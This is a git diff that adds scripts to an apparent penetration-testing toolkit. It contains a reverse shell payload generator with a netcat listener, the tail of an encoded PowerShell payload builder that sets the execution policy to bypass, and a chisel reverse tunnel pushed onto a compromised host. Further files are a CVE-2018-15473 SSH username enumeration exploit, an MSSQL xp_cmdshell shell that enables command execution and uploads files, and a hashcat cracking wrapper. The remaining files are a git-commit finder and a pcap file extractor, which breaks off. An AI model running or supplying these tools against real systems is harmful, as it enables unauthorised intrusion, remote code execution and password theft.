execution_policy = kwargs.get("execution_policy", "bypass")
|
||||
flags = ["-EncodedCommand", payload_encoded]
|
||||
if execution_policy is not None:
|
||||
flags.append("-ExecutionPolicy")
|
||||
flags.append(execution_policy)
|
||||
flags = " ".join(flags)
|
||||
payload = f"powershell.exe {flags}"
|
||||
else:
|
||||
payload = None
|
||||
print("[-] Unknown payload type:", payload_type)
|
||||
|
||||
return payload
|
||||
|
||||
def spawn_listener(port):
|
||||
signal.signal(signal.SIGINT, on_ctrl_c)
|
||||
while True:
|
||||
orig_stdin = os.dup(0)
|
||||
pid, fd = pty.fork()
|
||||
if pid == 0:
|
||||
os.dup2(orig_stdin, 0)
|
||||
x = os.execvp("nc", ["nc", "-lvvp", str(port)])
|
||||
else:
|
||||
try:
|
||||
while True:
|
||||
data = os.read(fd, 1024)
|
||||
if not data:
|
||||
break
|
||||
sys.stdout.buffer.write(data)
|
||||
sys.stdout.flush()
|
||||
except OSError as e:
|
||||
print("[!] OSError:", str(e), "respawning shell…")
|
||||
|
||||
def wait_for_connection(listener, timeout=None, prompt=True):
|
||||
start = time.time()
|
||||
if prompt:
|
||||
prompt = prompt if type(prompt) == str else "[ ] Waiting for shell"
|
||||
if timeout is not None:
|
||||
timer_len = sys.stdout.write("\r%s: %ds\r" % (prompt, timeout))
|
||||
sys.stdout.flush()
|
||||
else:
|
||||
print(prompt)
|
||||
|
||||
while listener.connection is None and listener.running:
|
||||
time.sleep(0.5)
|
||||
if timeout is not None:
|
||||
diff = time.time() - start
|
||||
if diff < timeout:
|
||||
sys.stdout.write(util.pad(f"\r%s: %ds" % (prompt, timeout - diff), timer_len, " ") + "\r")
|
||||
sys.stdout.flush()
|
||||
else:
|
||||
print(util.pad("\r[-] Shell timeout :(", timer_len, " ") + "\r")
|
||||
return None
|
||||
|
||||
return listener
|
||||
|
||||
def spawn_background_shell(port, timeout=None, prompt=True):
|
||||
listener = ShellListener("0.0.0.0", port)
|
||||
listener.startBackground()
|
||||
wait_for_connection(listener, timeout, prompt)
|
||||
return listener
|
||||
|
||||
def trigger_shell(func, port):
|
||||
def _wait_and_exec():
|
||||
time.sleep(1.5)
|
||||
func()
|
||||
|
||||
threading.Thread(target=_wait_and_exec).start()
|
||||
spawn_listener(port)
|
||||
|
||||
def trigger_background_shell(func, port, timeout=None, prompt=True):
|
||||
listener = ShellListener("0.0.0.0", port)
|
||||
listener.startBackground()
|
||||
threading.Thread(target=func).start()
|
||||
wait_for_connection(listener, timeout, prompt)
|
||||
return listener
|
||||
|
||||
def create_tunnel(shell, ports: list):
|
||||
if len(ports) == 0:
|
||||
print("[-] Need at least one port to tunnel")
|
||||
return
|
||||
|
||||
# TODO: ports
|
||||
|
||||
if isinstance(shell, ShellListener):
|
||||
# TODO: if chisel has not been transmitted yet
|
||||
# we need a exec sync function, but this requires guessing when the output ended or we need to know the shell prompt
|
||||
ipAddress = util.get_address()
|
||||
chiselPort = 3000
|
||||
chisel_path = os.path.join(os.path.dirname(__file__), "chisel64")
|
||||
shell.write_file("/tmp/chisel64", open(chisel_path, "rb"))
|
||||
shell.sendline("chmod +x /tmp/chisel64")
|
||||
|
||||
t = threading.Thread(target=os.system, args=(f"{chisel_path} server --port {chisel_port} --reverse", ))
|
||||
t.start()
|
||||
|
||||
shell.sendline(f"/tmp/chisel64 client --max-retry-count 1 {ipAddress}:{chiselPort} {ports} 2>&1 >/dev/null &")
|
||||
return t
|
||||
elif isinstance(shell, paramiko.SSHClient):
|
||||
paramiko_tunnel = ParamikoTunnel(shell, ports)
|
||||
paramiko_tunnel.start_background()
|
||||
return paramiko_tunnel
|
||||
|
||||
def on_ctrl_c(*args):
|
||||
global ctrl_c_pressed
|
||||
now = time.time()
|
||||
last_pressed = globals().get("ctrl_c_pressed", None)
|
||||
if not last_pressed or (now - last_pressed) > 1.5:
|
||||
print("[!] CTRL-C pressed. Press again if you really want to interrupt")
|
||||
else:
|
||||
sys.exit(0)
|
||||
|
||||
ctrl_c_pressed = now
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
parser = argparse.ArgumentParser(description="Reverse shell generator")
|
||||
parser.add_argument(dest="type", type=str, default=None, help="Payload type")
|
||||
parser.add_argument("-p", "--port", type=int, required=False, default=None, help="Listening port")
|
||||
parser.add_argument("-a", "--addr", type=str, required=False, default=util.get_address(), help="Listening address")
|
||||
args, extra = parser.parse_known_args()
|
||||
|
||||
listen_port = args.port
|
||||
payload_type = args.type.lower()
|
||||
local_address = args.addr
|
||||
extra_args = {}
|
||||
|
||||
for entry in extra:
|
||||
match = re.match(r"(\w+)=(\w+)", entry)
|
||||
if not match:
|
||||
print("Invalid extra argument:", entry)
|
||||
exit()
|
||||
key, value = match.groups()
|
||||
extra_args[key] = value
|
||||
|
||||
# choose random port
|
||||
if listen_port is None:
|
||||
listen_port = random.randint(10000,65535)
|
||||
while util.is_port_in_use(listen_port):
|
||||
listen_port = random.randint(10000,65535)
|
||||
|
||||
payload = generate_payload(payload_type, local_address, listen_port, **extra_args)
|
||||
if payload is None:
|
||||
print("Unknown payload type: %s" % payload_type)
|
||||
print("Supported types: sh, bash, perl, python[2|3], php, ruby, netcat|nc, java, xterm, powershell")
|
||||
exit(1)
|
||||
|
||||
if payload_type.startswith("python"):
|
||||
# e.g. python3.11
|
||||
tty_bin = payload_type
|
||||
else:
|
||||
tty_bin = "python"
|
||||
|
||||
tty = f"{tty_bin} -c 'import pty; pty.spawn(\"/bin/bash\")'"
|
||||
print("---PAYLOAD---\n%s\n---TTY---\n%s\n---------\n" % (payload, tty))
|
||||
|
||||
if payload_type == "xterm":
|
||||
print("You need to run the following commands (not tested):")
|
||||
print("xhost +targetip")
|
||||
print("Xnest :1")
|
||||
else:
|
||||
spawn_listener(listen_port)
|
||||
85
tools/exploits/ssh-check-username.py
Executable file
85
tools/exploits/ssh-check-username.py
Executable file
@@ -0,0 +1,85 @@
|
||||
#!/usr/bin/python3
|
||||
import multiprocessing
|
||||
import threading
|
||||
import time
|
||||
import os
|
||||
import argparse
|
||||
import logging
|
||||
import paramiko
|
||||
import socket
|
||||
import sys
|
||||
import pdb
|
||||
|
||||
# CVE-2018-15473 (OpenSSH 7.7)
|
||||
|
||||
class InvalidUsername(Exception):
|
||||
pass
|
||||
|
||||
|
||||
def add_boolean(*args, **kwargs):
|
||||
pass
|
||||
|
||||
old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
|
||||
|
||||
def service_accept(*args, **kwargs):
|
||||
paramiko.message.Message.add_boolean = add_boolean
|
||||
return old_service_accept(*args, **kwargs)
|
||||
|
||||
|
||||
def userauth_failure(*args, **kwargs):
|
||||
raise InvalidUsername()
|
||||
|
||||
|
||||
def _paramiko_tunnel(username, *args, **kwargs):
|
||||
sock = socket.socket()
|
||||
sock.connect((target, port))
|
||||
us = username.strip()
|
||||
try:
|
||||
transport = paramiko.transport.Transport(sock)
|
||||
except socket.error:
|
||||
print ('[-] Failed to connect')
|
||||
return
|
||||
try:
|
||||
transport.start_client()
|
||||
except paramiko.ssh_exception.SSHException:
|
||||
print ('[-] Failed to negotiate SSH transport')
|
||||
return
|
||||
try:
|
||||
transport.auth_publickey(us, paramiko.RSAKey.generate(2048))
|
||||
except InvalidUsername or socket.error:
|
||||
print ('[*] {} - Invalid username'.format(us))
|
||||
except paramiko.ssh_exception.AuthenticationException:
|
||||
print ('[+] {} - Valid username'.format(us))
|
||||
return
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
arg_parser = argparse.ArgumentParser()
|
||||
arg_parser.add_argument('-H',dest='hostname', type=str, help='Single target')
|
||||
arg_parser.add_argument('-t',dest='threads', type=int, help='Number of threads', default=10)
|
||||
arg_parser.add_argument('-p',dest='port', type=int, default=22, help='port to connect on: Default port is 22')
|
||||
arg_parser.add_argument('-u',dest='username', type=str, help='username you want to enumerate')
|
||||
arg_parser.add_argument('-w',dest='wordlist', help='enumerate multiple users')
|
||||
args = arg_parser.parse_args()
|
||||
port = args.port
|
||||
target = args.hostname
|
||||
|
||||
paramiko.auth_handler.AuthHandler._client_handler_table.update({
|
||||
paramiko.common.MSG_SERVICE_ACCEPT: service_accept,
|
||||
paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure
|
||||
})
|
||||
|
||||
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
|
||||
|
||||
if args.username is not None:
|
||||
username = args.username
|
||||
_paramiko_tunnel(target, port, username)
|
||||
|
||||
if args.wordlist is not None:
|
||||
usernames = []
|
||||
mp = []
|
||||
pool = multiprocessing.Pool(args.threads)
|
||||
with open(args.wordlist) as f:
|
||||
for u in f:
|
||||
usernames.append(u)
|
||||
pool.map(_paramiko_tunnel, usernames)
|
||||
181
tools/exploits/xp_cmdshell.py
Executable file
181
tools/exploits/xp_cmdshell.py
Executable file
@@ -0,0 +1,181 @@
|
||||
#!/usr/bin/env python3
|
||||
|
||||
# interactive xp_cmdshell
|
||||
# with impacket and cmd
|
||||
# used https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py for reference
|
||||
import base64
|
||||
import cmd
|
||||
import argparse
|
||||
|
||||
from impacket import tds
|
||||
|
||||
|
||||
class XpShell(cmd.Cmd):
|
||||
|
||||
def __init__(self, SQLObj):
|
||||
cmd.Cmd.__init__(self)
|
||||
self.sql = SQLObj
|
||||
self.prompt = 'xp_cmd> '
|
||||
self.file = None
|
||||
self.pwsh = False
|
||||
|
||||
@staticmethod
|
||||
def powershell_encode(data):
|
||||
return base64.b64encode(data.encode('UTF-16LE')).decode()
|
||||
|
||||
@staticmethod
|
||||
def powershell_encode_binary(data):
|
||||
return base64.b64encode(data).decode()
|
||||
|
||||
# interpret every line as system command
|
||||
def default(self, arg):
|
||||
try:
|
||||
|
||||
if self.pwsh:
|
||||
new_arg = 'powershell -encodedCommand {}'
|
||||
arg = new_arg.format(self.powershell_encode(arg))
|
||||
|
||||
self.execute_query(arg)
|
||||
|
||||
except ConnectionResetError as e:
|
||||
self.reconnect_mssql()
|
||||
self.execute_query(arg)
|
||||
except Exception as e:
|
||||
print('Exception: ')
|
||||
print(str(e))
|
||||
raise e
|
||||
|
||||
# i wont say what it does
|
||||
def do_exit(self, arg):
|
||||
exit()
|
||||
|
||||
# ? yes
|
||||
def do_help(self, arg):
|
||||
print("""
|
||||
you found the help command
|
||||
|
||||
pwsh - Toggle powershell on/off
|
||||
upload <src> <dest> - upload a file
|
||||
exit - i wont say what it does
|
||||
""")
|
||||
|
||||
def do_upload(self, data, dest):
|
||||
writeme = bytearray() # contains bytes to be written
|
||||
cmd = 'New-Item -Path {} -Force'.format(dest)
|
||||
cmd = self.powershell_encode(cmd)
|
||||
|
||||
try:
|
||||
# create/overwrite the target file with powershell
|
||||
self.execute_query('powershell -encodedCommand {}'.format(cmd))
|
||||
except FileNotFoundError as e:
|
||||
print('File not found.')
|
||||
return
|
||||
except ConnectionResetError as e:
|
||||
self.reconnect_mssql()
|
||||
self.execute_query('powershell -encodedCommand {}'.format(cmd))
|
||||
except Exception as e:
|
||||
print('Exception: ')
|
||||
print(str(e))
|
||||
return
|
||||
|
||||
total_uploaded = 0 # uploaded bytes so far
|
||||
count = 0 # counter to run through byte array
|
||||
write_count = 2000 # write 2000 bytes with each command
|
||||
|
||||
# run through all bytes of the file which have been saved in data
|
||||
for b in data:
|
||||
writeme.append(b)
|
||||
# write 'write_count' bytes with each command
|
||||
if count != 0 and count % write_count == 0:
|
||||
self.write_bytes_to_file(writeme, dest)
|
||||
|
||||
writeme = bytearray()
|
||||
total_uploaded += write_count
|
||||
count = 0
|
||||
print('Uploaded {} of {} bytes'.format(total_uploaded,len(data)))
|
||||
count += 1
|
||||
|
||||
# if there are unwritten write them
|
||||
if count > 0:
|
||||
self.write_bytes_to_file(writeme, dest)
|
||||
|
||||
total_uploaded += count
|
||||
print('Uploaded {} of {} bytes'.format(total_uploaded, len(data)))
|
||||
|
||||
# executed when ConnectionResetError
|
||||
def reconnect_mssql(self):
|
||||
print('connection lost attempting to reconnect...')
|
||||
self.sql.disconnect()
|
||||
ms_sql, res = connect_mssql()
|
||||
if res is True:
|
||||
self.sql = ms_sql
|
||||
print('Success!')
|
||||
else:
|
||||
print('Could not re-establish connection. Exiting.')
|
||||
exit()
|
||||
|
||||
|
||||
# execute xp_cmdshell command
|
||||
def execute_query(self, arg):
|
||||
self.sql.sql_query("exec master..xp_cmdshell '{}'".format(arg))
|
||||
self.sql.printReplies()
|
||||
self.sql.colMeta[0]['TypeData'] = 80*1
|
||||
self.sql.printRows()
|
||||
|
||||
def do_enable_xp_cmdshell(self):
|
||||
try:
|
||||
self.sql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;"
|
||||
"exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
|
||||
self.sql.printReplies()
|
||||
self.sql.printRows()
|
||||
except Exception as e:
|
||||
raise e
|
||||
|
||||
# encodes bytes as base64 and writes them to a file via powershell
|
||||
def write_bytes_to_file(self, data, target):
|
||||
data = self.powershell_encode_binary(data)
|
||||
|
||||
# cmd to append bytes to file
|
||||
cmd = "powershell -command \"Add-Content -value ([Convert]::FromBase64String(\'{}\')) -encoding byte -path \'{}\'\"".format(data, target)
|
||||
cmd = self.powershell_encode(cmd)
|
||||
|
||||
# execute file write
|
||||
try:
|
||||
self.execute_query('powershell -encodedCommand {}'.format(cmd))
|
||||
except ConnectionResetError as e:
|
||||
self.reconnect_mssql()
|
||||
|
||||
|
||||
def connect_mssql(ip, port=1433, username="sa", password="", domain=""):
|
||||
# do database connection (simple for now)
|
||||
ms_sql = tds.MSSQL(ip, port)
|
||||
ms_sql.connect()
|
||||
res = ms_sql.login(database=None, username=username, password=password, domain=domain)
|
||||
ms_sql.printReplies()
|
||||
print(res)
|
||||
if res:
|
||||
return XpShell(ms_sql)
|
||||
else:
|
||||
return res
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
# pass commands directly into powershell
|
||||
# ./xp_cmdshell.py -powershell
|
||||
# if len(sys.argv) > 1 and sys.argv[1] == '-powershell':
|
||||
# pwsh = True
|
||||
|
||||
parser = argparse.ArgumentParser(description="Connect to mssql server using username, password, and hostname.")
|
||||
parser.add_argument('-u', '--username', required=True, help="Username for the server")
|
||||
parser.add_argument('-p', '--password', required=False, default="", help="Password for the server")
|
||||
parser.add_argument('-H', '--hostname', required=True, help="Hostname or IP address of the server")
|
||||
parser.add_argument('-d', '--domain', required=False, default=None, help="Domain the user belongs to")
|
||||
args = parser.parse_args()
|
||||
|
||||
# if connection successful
|
||||
xp_shell = connect_mssql(args.hostname, username=args.username, password=args.password, domain=args.domain)
|
||||
if isinstance(xp_shell, XpShell):
|
||||
xp_shell.do_enable_xp_cmdshell()
|
||||
xp_shell.pwsh = True
|
||||
xp_shell.cmdloop()
|
||||
xp_shell.sql.disconnect()
|
||||
100
tools/misc/crack_hash.py
Executable file
100
tools/misc/crack_hash.py
Executable file
@@ -0,0 +1,100 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
import os
|
||||
import sys
|
||||
import subprocess
|
||||
import json
|
||||
import tempfile
|
||||
from name_that_hash import runner
|
||||
|
||||
def load_cracked_hashes():
|
||||
potfile_path = os.path.join(os.path.expanduser("~"), ".hashcat", "hashcat.potfile")
|
||||
cracked_hashes = { }
|
||||
if os.path.isfile(potfile_path):
|
||||
with open(potfile_path, "r") as f:
|
||||
for line in f:
|
||||
hash, password = line.strip().rsplit(":",1)
|
||||
cracked_hashes[hash] = password
|
||||
|
||||
return cracked_hashes
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
if len(sys.argv) < 2:
|
||||
print("Usage: %s <file>" % sys.argv[0])
|
||||
exit(1)
|
||||
|
||||
hashes = filter(None, [line.strip() for line in open(sys.argv[1],"r").readlines()])
|
||||
potfile = load_cracked_hashes()
|
||||
if potfile:
|
||||
uncracked_hashes = []
|
||||
for hash in hashes:
|
||||
password = potfile.get(hash, potfile.get(hash.rsplit(":", 1)[0], None))
|
||||
if password:
|
||||
print(f"Potfile: {hash}: {password}")
|
||||
else:
|
||||
uncracked_hashes.append(hash)
|
||||
else:
|
||||
uncracked_hashes = hashes
|
||||
|
||||
hashes = json.loads(runner.api_return_hashes_as_json(uncracked_hashes))
|
||||
wordlist = "/usr/share/wordlists/rockyou.txt" if len(sys.argv) < 3 else sys.argv[2]
|
||||
|
||||
hash_types = { }
|
||||
for hash, types in hashes.items():
|
||||
for t in types:
|
||||
hash_id = t["hashcat"]
|
||||
if hash_id is None:
|
||||
continue
|
||||
|
||||
salted = ":" in hash
|
||||
if salted != t["extended"]:
|
||||
continue
|
||||
|
||||
if hash_id not in hash_types:
|
||||
hash_types[hash_id] = { "name": t["name"], "hashes": {hash} }
|
||||
else:
|
||||
hash_types[hash_id]["hashes"].add(hash)
|
||||
|
||||
if len(hash_types) > 0:
|
||||
uncracked_types = list(hash_types.keys())
|
||||
num_types = len(uncracked_types)
|
||||
if num_types > 1:
|
||||
print("There are multiple uncracked hashes left with different hash types, choose one to proceed with hashcat:")
|
||||
print()
|
||||
|
||||
i = 0
|
||||
for hash_id, hash_type in hash_types.items():
|
||||
name = (hash_type["name"] + ": ").ljust(max(len(x["name"]) for x in hash_types.values()) + 2)
|
||||
count = len(hash_type["hashes"])
|
||||
index = (f"{i}. ").ljust(len(str(num_types - 1)) + 2)
|
||||
print(f"{index}{name}{count} hashe(s)")
|
||||
i += 1
|
||||
|
||||
# Ask user…
|
||||
selected = None
|
||||
while selected is None or selected < 0 or selected >= num_types:
|
||||
try:
|
||||
selected = int(input("Your Choice: ").strip())
|
||||
if selected >= 0 and selected < num_types:
|
||||
break
|
||||
except Exception as e:
|
||||
if type(e) in [EOFError, KeyboardInterrupt]:
|
||||
print()
|
||||
exit()
|
||||
|
||||
print("Invalid input")
|
||||
selected_type = uncracked_types[selected]
|
||||
else:
|
||||
selected_type = uncracked_types[0]
|
||||
|
||||
fp = tempfile.NamedTemporaryFile()
|
||||
for hash in hash_types[selected_type]["hashes"]:
|
||||
fp.write(b"%s\n" % hash.encode("UTF-8"))
|
||||
fp.flush()
|
||||
|
||||
proc = subprocess.Popen(["hashcat", "-m", str(selected_type), "-a", "0", fp.name, wordlist] + sys.argv[2:])
|
||||
proc.wait()
|
||||
fp.close()
|
||||
else:
|
||||
print("No uncracked hashes left")
|
||||
185
tools/misc/find_git_commit.py
Executable file
185
tools/misc/find_git_commit.py
Executable file
@@ -0,0 +1,185 @@
|
||||
#!/usr/bin/env python3
|
||||
|
||||
import argparse
|
||||
import re
|
||||
import os
|
||||
import tempfile
|
||||
import subprocess
|
||||
import collections
|
||||
import shutil
|
||||
import hashlib
|
||||
import datetime
|
||||
|
||||
PROC_ENV = { "LC_ALL": "C" }
|
||||
|
||||
def run_cmd(cmd, dir=None, raw=False):
|
||||
proc = subprocess.Popen(cmd, cwd=dir, env=PROC_ENV, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
|
||||
out = b"".join(proc.communicate())
|
||||
|
||||
if not raw:
|
||||
out = out.decode().strip()
|
||||
|
||||
exit_code = proc.returncode
|
||||
return exit_code, out
|
||||
|
||||
|
||||
def check_git_dir(dir):
|
||||
exit_code, out = run_cmd(["git", "status"], dir)
|
||||
if "not a git repository" in out:
|
||||
print("[-] Given directory is not a git repository.")
|
||||
return False
|
||||
elif "Your branch is up to date" not in out \
|
||||
or "nothing to commit, working tree clean" not in out:
|
||||
print("[-] Git repository is not in a clean state, please reset it to HEAD")
|
||||
return False
|
||||
elif exit_code != 0:
|
||||
print("[-] Error checking given directory:", out)
|
||||
return False
|
||||
else:
|
||||
return True
|
||||
|
||||
|
||||
def git_clone(dir, url):
|
||||
print(f"[ ] Cloning {url} to {dir}")
|
||||
exit_code, out = run_cmd(["git", "clone", url, dir, "-q"])
|
||||
if exit_code != 0:
|
||||
print("[-] Error cloing git repository:")
|
||||
print(out)
|
||||
return False
|
||||
return True
|
||||
|
||||
|
||||
def check_input_dir(dir):
|
||||
if not os.path.isdir(dir):
|
||||
print("[-] Invalid directory:", dir)
|
||||
return False
|
||||
|
||||
if os.path.isdir(os.path.join(dir, ".git")):
|
||||
print("[-] Directory to check should not be a git repository")
|
||||
return False
|
||||
|
||||
valid_files = []
|
||||
real_root = os.path.realpath(dir)
|
||||
for root, subdirs, files in os.walk(dir):
|
||||
for file in files:
|
||||
full_path = os.path.realpath(os.path.join(root, file))
|
||||
file_size = os.path.getsize(full_path)
|
||||
if file_size > 0:
|
||||
relative_path = full_path[len(real_root) + 1:]
|
||||
valid_files.append(relative_path)
|
||||
|
||||
if len(valid_files) == 0:
|
||||
print("[-] Given directory does not contain any non-empty files")
|
||||
return False
|
||||
|
||||
return valid_files
|
||||
|
||||
|
||||
def get_commits_for_file(file, git_dir):
|
||||
cmd = ["git","log","--no-color", "--pretty=format:%H %at", "--all","--", file]
|
||||
exit_code, out = run_cmd(cmd, git_dir)
|
||||
if exit_code != 0:
|
||||
print("[-] git-log failed:", out)
|
||||
return None
|
||||
else:
|
||||
lines = out.split("\n")
|
||||
commits = collections.OrderedDict()
|
||||
for line in lines:
|
||||
if line:
|
||||
data = line.split(" ")
|
||||
hash, ts = line.split(" ")
|
||||
commits[hash] = int(ts)
|
||||
|
||||
return commits
|
||||
|
||||
def hash(data, alg):
|
||||
h = hashlib.new(alg)
|
||||
h.update(data)
|
||||
return h.hexdigest()
|
||||
|
||||
def read_file(file):
|
||||
with open(file, "rb") as f:
|
||||
return f.read()
|
||||
|
||||
def find_newest_commit(git_dir, file_name, sha1hash, md5hash, commits):
|
||||
for commit_hash in reversed(commits.keys()):
|
||||
cmd = ["git", "show", f"{commit_hash}:{file_name}"]
|
||||
exit_code, out = run_cmd(cmd, git_dir, raw=True)
|
||||
if exit_code != 0:
|
||||
print("[-] git-show failed:", out)
|
||||
return None
|
||||
elif sha1hash == hash(out, "sha1") and md5hash == hash(out, "md5"):
|
||||
return commit_hash
|
||||
return None
|
||||
|
||||
def get_commit_message(dir, commit_hash):
|
||||
cmd = ["git","log","--no-color", "--pretty=format:%B", "-n1", commit_hash]
|
||||
exit_code, out = run_cmd(cmd, dir)
|
||||
if exit_code != 0:
|
||||
print("[-] git-log failed:", out)
|
||||
return None
|
||||
else:
|
||||
return out
|
||||
|
||||
def run(files, root_dir, git_dir):
|
||||
|
||||
latest_commit = None
|
||||
latest_ts = None
|
||||
|
||||
for f in files:
|
||||
commits = get_commits_for_file(f, git_dir)
|
||||
if commits:
|
||||
print(f"[+] {f} found in git history")
|
||||
sha1hash = hash(read_file(os.path.join(root_dir, f)), "sha1")
|
||||
md5hash = hash(read_file(os.path.join(root_dir, f)), "md5")
|
||||
found_commit = find_newest_commit(git_dir, f, sha1hash, md5hash, commits)
|
||||
if found_commit:
|
||||
print(f"[+] Commit {found_commit} matches")
|
||||
if latest_commit is None or commits[found_commit] > latest_ts:
|
||||
latest_commit = found_commit
|
||||
latest_ts = commits[found_commit]
|
||||
else:
|
||||
print(f"[-] {f} not found in git history")
|
||||
|
||||
if latest_commit is None:
|
||||
print("[-] No matching commit found")
|
||||
else:
|
||||
title = get_commit_message(git_dir, latest_commit)
|
||||
formatted_dt = datetime.datetime.fromtimestamp(latest_ts).strftime("%A, %d. %B %Y %I:%M%p")
|
||||
print(f"[+] Commit might be: {latest_commit}, {formatted_dt}, {title}")
|
||||
|
||||
if __name__ == "__main__":
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument(
|
||||
dest="dir",
|
||||
help="The directory containing downloaded files"
|
||||
)
|
||||
parser.add_argument(
|
||||
dest="git",
|
||||
help="URL or path to git repository to compare to"
|
||||
)
|
||||
parser.add_argument(
|
||||
"-n",
|
||||
"--no-delete",
|
||||
dest="nodelete",
|
||||
action="store_true",
|
||||
help="Don't delete the git directory after cloning"
|
||||
)
|
||||
|
||||
is_remote_git = False
|
||||
args = parser.parse_args()
|
||||
git_dir = args.git
|
||||
if re.match("^(git|https?)://.*", args.git) or \
|
||||
(len(args.git.split(":")) == 2 and "@" in args.git.split(":")[0]):
|
||||
git_dir = tempfile.TemporaryDirectory(suffix=".git").name
|
||||
is_remote_git = True
|
||||
if not git_clone(git_dir, args.git):
|
||||
exit(1)
|
||||
|
||||
if check_git_dir(git_dir):
|
||||
valid_files = check_input_dir(args.dir)
|
||||
if valid_files != False:
|
||||
run(valid_files, args.dir, git_dir)
|
||||
|
||||
if is_remote_git and not args.nodelete:
|
||||
shutil.rmtree(git_dir)
|
||||
362
tools/misc/pcap_file_extract.py
Executable file
362
tools/misc/pcap_file_extract.py
Executable file
@@ -0,0 +1,362 @@
|
||||
#!/bin/python
|
||||
|
||||
import argparse
|
||||
import os
|
||||
import re
|
||||
from abc import ABC, abstractmethod
|
||||
from scapy.all import *
|
||||
from hackingscripts import util
|
||||
from collections import OrderedDict
|
||||
|
||||
|
||||
class HttpPacket(ABC):
|
||||
def __init__(self, sock_src, version):
|
||||
self.version = version
|
||||
self.headers = util.CaseInsensitiveDict()
|
||||
self.payload = None
|
||||
self.socket = sock_src
|
||||
|
||||
@staticmethod
|
||||
def parse(sock_src, data):
|
||||
index = data.index(b"\r\n")
|
||||
first_line = data[0:index+2].decode()
|
||||
matches_req = re.match(HttpRequest.PATTERN.decode(), first_line)
|
||||
matches_res = re.match(HttpResponse.PATTERN.decode(), first_line)
|
||||
if matches_req:
|
||||
http_packet = HttpRequest(sock_src, *matches_req.groups())
|
||||
elif matches_res:
|
||||
http_packet = HttpResponse(sock_src, *matches_res.groups())
|
||||
else:
|
||||
return None
|
||||
|
||||
header_end = data.index(b"\r\n\r\n")
|
||||
header_buffer = data[index+2:header_end+2].decode()
|
||||
http_packet.payload = data[header_end+4:]
|
||||
for line in re.findall("([^:]+):\s?(.*)\r\n", header_buffer):
|
||||
http_packet.headers[line[0]] = line[1]
|
||||
|
||||
return http_packet
|
||||
|
||||
@abstractmethod
|
||||
def get_file_path(self):
|
||||
pass
|
||||
|
||||
|
||||
class HttpRequest(HttpPacket):
|
||||
PATTERN = b"([A-Z]+) ([^ ]+) HTTP/([0-9.]+)\r\n"
|
||||
|
||||
def __init__(self, socket, method, uri, version):
|
||||
super().__init__(socket, version)
|
||||
self.method = method
|
||||
self.uri = uri
|
||||
|
||||
def __repr__(self):
|
||||
return f"{self.method} {self.uri} HTTP/{self.version}, payload=" + util.human_readable_size(len(self.payload))
|
||||
|
||||
def get_file_path(self):
|
||||
return self.uri
|
||||
|
||||
|
||||
class HttpResponse(HttpPacket):
|
||||
PATTERN = b"HTTP/([0-9.]+) ([0-9]+) (.*)\r\n"
|
||||
|
||||
def __init__(self, socket, version, status_code, status_text):
|
||||
super().__init__(socket, version)
|
||||
self.status_code = int(status_code)
|
||||
self.status_text = status_text
|
||||
self.response_to = None
|
||||
|
||||
def get_file_path(self):
|
||||
content_disposition = self.headers.get("Content-Disposition", None)
|
||||
if content_disposition:
|
||||
matches = re.findall(";\s*filename=\"?(.*)\"?(;|$)", content_disposition)
|
||||
if matches:
|
||||
return matches[0][0]
|
||||
|
||||
if self.response_to:
|
||||
return self.response_to.get_file_path()
|
||||
|
||||
return None
|
||||
|
||||
def __repr__(self):
|
||||
return f"HTTP/{self.version} {self.status_code} {self.status_text}, payload=" + util.human_readable_size(len(self.payload))
|
||||
|
||||
class PacketIterator:
|
||||
def __init__(self, connection):
|
||||
self.connection = connection
|
||||
self.index = 0
|
||||
|
||||
def __iter__(self):
|
||||
self.index = 0
|
||||
return self
|
||||
|
||||
def __next__(self):
|
||||
if self.has_more():
|
||||
packet = self.connection.packets[self.index]
|
||||
self.index += 1
|
||||
return packet
|
||||
else:
|
||||
raise StopIteration
|
||||
|
||||
def peek(self):
|
||||
return None if not self.has_more() else self.connection.packets[self.index]
|
||||
|
||||
def pop(self):
|
||||
packet = self.peek()
|
||||
if packet:
|
||||
self.index += 1
|
||||
return packet
|
||||
|
||||
def find_packet(self, pattern, sock_src=None):
|
||||
for packet in self.connection.packets[self.index:]:
|
||||
self.index += 1
|
||||
tcp_packet = packet[TCP]
|
||||
ip_hdr = packet[IP]
|
||||
packet_src = f"{ip_hdr.src}:{tcp_packet.sport}"
|
||||
if sock_src is not None and packet_src != sock_src:
|
||||
continue
|
||||
|
||||
payload = bytes(tcp_packet.payload)
|
||||
match = re.findall(pattern, payload)
|
||||
if match:
|
||||
return packet, match[0], packet_src
|
||||
return None
|
||||
|
||||
def has_more(self):
|
||||
return self.index < len(self.connection.packets)
|
||||
|
||||
|
||||
class TcpConnection:
|
||||
def __init__(self, sock_a, sock_b):
|
||||
self.sock_a = sock_a
|
||||
self.sock_b = sock_b
|
||||
self.packets = []
|
||||
self._payload_size = 0
|
||||
|
||||
def add_packet(self, packet):
|
||||
self.packets.append(packet)
|
||||
self._payload_size += len(packet[TCP].payload)
|
||||
|
||||
def get_key(self):
|
||||
return TcpConnections._format_key(self.sock_a, self.sock_b)
|
||||
|
||||
def iterator(self):
|
||||
return PacketIterator(self)
|
||||
|
||||
def get_other_sock(self, sock):
|
||||
return self.sock_a if sock == self.sock_b else self.sock_b
|
||||
|
||||
def __repr__(self):
|
||||
return f"{self.get_key()}: {len(self.packets)} packets, {util.human_readable_size(self._payload_size)}"
|
||||
|
||||
|
||||
class TcpConnections:
|
||||
def __init__(self):
|
||||
self.connections = OrderedDict()
|
||||
|
||||
def __contains__(self, item: TcpConnection):
|
||||
return str(item) in self.connections
|
||||
|
||||
def add(self, element: TcpConnection):
|
||||
self.connections[str(element)] = element
|
||||
|
||||
def __getitem__(self, item: TcpConnection):
|
||||
return self.connections[str(item)]
|
||||
|
||||
def __iter__(self):
|
||||
return iter(self.connections.values())
|
||||
|
||||
@staticmethod
